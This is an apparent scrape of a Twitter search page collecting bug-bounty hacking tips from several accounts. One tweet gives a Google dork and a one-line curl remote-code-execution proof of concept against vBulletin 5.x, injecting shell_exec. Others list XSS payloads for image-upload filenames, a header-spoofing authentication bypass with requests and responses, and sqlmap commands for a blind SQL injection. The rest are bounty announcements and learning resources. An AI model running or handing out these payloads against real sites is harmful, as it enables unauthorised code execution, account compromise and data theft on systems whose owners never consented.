Twitter | Search | |
Search Refresh
Narendra Bhati Aug 6
1st Bounty of $16000 From Apple. Not that big but good to start with. Expecting more emails from Apple in upcoming weeks. 😅
Reply Retweet Like
h4x0r-dz Aug 9
If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png
Reply Retweet Like
GoDiego Aug 3
Reply Retweet Like
karthik sunny Aug 4
Always try to fetch hidden web directories In subdomains of the target
Reply Retweet Like
what_web Aug 8
How to find authentication bypass vulnerabilities. Focus. I Added headers. Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found
Reply Retweet Like
Haones Aug 9
Validate your email address with the payload you can here: And find the reference to RFC822 as well. Helped me to find a plenty of nice bugs :)
Reply Retweet Like
h4x0r-dz 17h
0day RCE exploit on vBulletin 5xx dork ; intext:"Powered by vBulletin" POC curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
Reply Retweet Like
Cyber Pirate Aug 8
Resources For WEBSITES 1.Portswigger Web Academy 2.Hacks Planning 3.Hacker101 4.Null byte 5.Hacking Articles 6.Infosec Twitter 7.GBHackers 8.TheHackersNews [~] And more in this 🧵 Tweet smthng which i missed..
Reply Retweet Like
Hx01 Aug 8
I created a burpsuite plugin for parsing quoted-printable encoded emails; this may help if you use burp collaborator SMTP for conducting tests & want to decode email confirmation URLs.
Reply Retweet Like
Mirhat Aug 8
Here's the tip 1. Website has upload image function 2. Upload a jpg file called <img src=x onerror=alert(1)>.jpg in comments or other places someone else can see 3. and.. Stored XSS triggers
Reply Retweet Like
Hack3rScr0lls Aug 8
WebSocket is a widespread technology in modern Web. Incorrect implementation can lead to a simple but critical vulnerability – WebSocket Hijacking. Example: Try it in the Lab:
Reply Retweet Like
m4ll0k Aug 4
Trick that allowed me to find many IDORs..
Reply Retweet Like
michaelben Aug 2
Reply Retweet Like
Muhammad Fauzan Aug 6
ALHUMDULILLAH ♥️ first time got 4 digits bounty , 1000$ 🥰😘😍 Bug type : session fixation , broken authentication
Reply Retweet Like
Jenish Sojitra 11h
How I was able to find multiple critical vulnerabilities to get Full Account Takeover with the help of PlayStore and AppStore region settings.
Reply Retweet Like
Faizal Abroni Aug 3
1. found blind sql injection 2. use simple payload ./sqlmap -r req -p vuln --dbs 3. the backend db is Firebird 4. cant retrieve dbname or table 5. change payload to -r req -p vuln--level 3 --risk 3 --thread 8 --dbms Firebird --tables 6. puf! *image below
Reply Retweet Like
Harsh Bothra Aug 8
Planning a session for the newcomers in Comment down "What are the common questions & issues that you face in your bug bounty journey?" I'll share the dates and limited registration form (all free) but all ques will be answered. (1/2)
Reply Retweet Like
Findomain App Aug 7
Subdomains discover + HTTP check + content type/content size/response code + website title + IP + CNAME records + Screenshots of subdomain websites (compressed) for spotify[.]com in 134 seconds. plus binaries will be released soon
Reply Retweet Like
Y A S H G O T I Aug 5
Need some real time links/urls for target hosts Check this out gal 🔥🔥🔥
Reply Retweet Like
Jitesh Kumar Aug 9
Reply Retweet Like